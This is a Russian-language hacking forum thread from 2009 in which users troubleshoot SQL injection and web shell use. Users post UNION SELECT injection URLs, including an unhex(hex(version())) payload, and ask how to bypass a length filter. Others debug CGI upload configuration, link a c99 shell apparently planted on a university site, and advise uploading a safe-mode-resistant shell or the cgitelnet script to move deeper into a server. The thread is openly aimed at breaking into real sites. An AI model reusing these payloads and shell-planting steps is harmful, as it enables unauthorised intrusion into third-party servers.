15.05.2009, 13:51
|
|
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842
Репутация:
239
|
|
Вопросик есть
http://www.site.ru/index.php?Id=-1+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12+FROM+U SERS+LIMIT+0,1+%23+
все цифры выводит на ура, но если например вместо 1 ил 3 написать user() или еще чет то еррор
mysql_num_rows(): supplied argument is not a valid MySQL result resource in ....index.php on line 459
как исправить? |
|
|
15.05.2009, 13:57
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Код:
-1+UNION+SELECT+0,unhex(hex(version())),2,3,4,5,6,7,8,9,10,11,12+FROM+U SERS+LIMIT+0,1+%23+
Последний раз редактировалось R1dex; 15.05.2009 в 14:07..
|
|
|
|
15.05.2009, 14:13
|
|
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842
Репутация:
239
|
|
неа, не работает вот еще что нашел
Id=-1+UNION+SELECT+0,user(),2,3,4,5,6,7,8,9,10,11,12+F ROM+USERS+LIMIT+1,1+%23+
выводит Юзера
Id=-1000+UNION+SELECT+0,user(),2,3,4,5,6,7,8,9,10,11,1 2+FROM+USERS+LIMIT+1,1+%23+
Не выводит Юзера
но сам прикол что выводит только юзера, пишешь версию и еррор
|
|
|
|
15.05.2009, 14:14
|
|
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842
Репутация:
239
|
|
позоду стоит проверка на кол символом, вводишь 0x2b норм вводишь чет длиннее и ниче, как можно обойти?
|
|
|
|
15.05.2009, 14:14
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Кидай в пм ссылку, посмотрим.
|
|
|
|
15.05.2009, 15:17
|
|
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
Провел на форуме:
461696
Репутация:
40
|
|
Залил 2 перловых файла одинакового содержания:
PHP код:
#!/usr/bin/perl
print "Content-Type:text/html\n\n";
print "HELLO WORLD!\n";
назвал их perl.pl и perl.cgi
права у обоих 755
содержимое .htaccess было таким:
PHP код:
Options +ExecCGI
AddHandler cgi-script .cgi .pl
и таким:
PHP код:
Options ExecCGI
AddHandler cgi-script .cgi .pl
и таким:
PHP код:
Options +ExecCGI
AddHandler cgi-script .cgi .pl
ScriptInterpreterSource registry
и таким:
PHP код:
Options +ExecCGI
AddType application/x-httpd-cgi .pl .cgi
и таким:
PHP код:
Options +ExecCGI
AddType application/x-httpd-cgi .pl .cgi
ScriptInterpreterSource registry
и таким:
PHP код:
Options +ExecCGI
AddHandler cgi-script .cgi .pl
AddType application/x-httpd-cgi .pl .cgi
права на .htaccess 744
Владелец скриптов: 80/4962 (uid/gid)
У папки, в которой лежат скрипты права 777, владелец - 4962/4962
Запись в папку cgi-bin запрещена (права 755)
И всё время - ошибка 500 Internal Server Error!!! Что делать я не знаю, подскажите пожалуйста!
А да забыл написать, символы \r из концов строк я удалил. |
|
|
|
15.05.2009, 22:59
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435
Репутация:
90
|
|
сейф возможно обойти? Каким образом?...помогите =))
Последний раз редактировалось jokester; 16.05.2009 в 00:27..
|
|
|
|
15.05.2009, 23:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от +++AndreyDevil+++
http://www.uvm.edu/~uvmsga/documents/c99.php
Здесь сейф возможно обойти? Каким образом?...помогите =))
ровно на 1 пост выше своего читай 
|
|
|
|
15.05.2009, 23:08
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме:
418218
Репутация:
59
|
|
Залей шелл который работает при включеном Safe-mode
Или же пробуй это:
http://www.rohitab.com/cgiscripts/cgitelnet.txt
переменуй в *.cgi и помести в папку cgi-bin с правами 755 и с помощю скрипта переходи дальше..
Последний раз редактировалось bug1z; 15.05.2009 в 23:17..
|
|
|
|
15.05.2009, 23:15
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435
Репутация:
90
|
|
А посоветовать что нить конкретное можешь?
Сообщение от bug1z
Или же пробуй это:
http://www.rohitab.com/cgiscripts/cgitelnet.txt
переменуй в *.cgi и помести в папку cgi-bin с правами 755 и с помощю скрипта переходи дальше..
Добраться бы до неё...
Последний раз редактировалось +++AndreyDevil+++; 15.05.2009 в 23:18..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
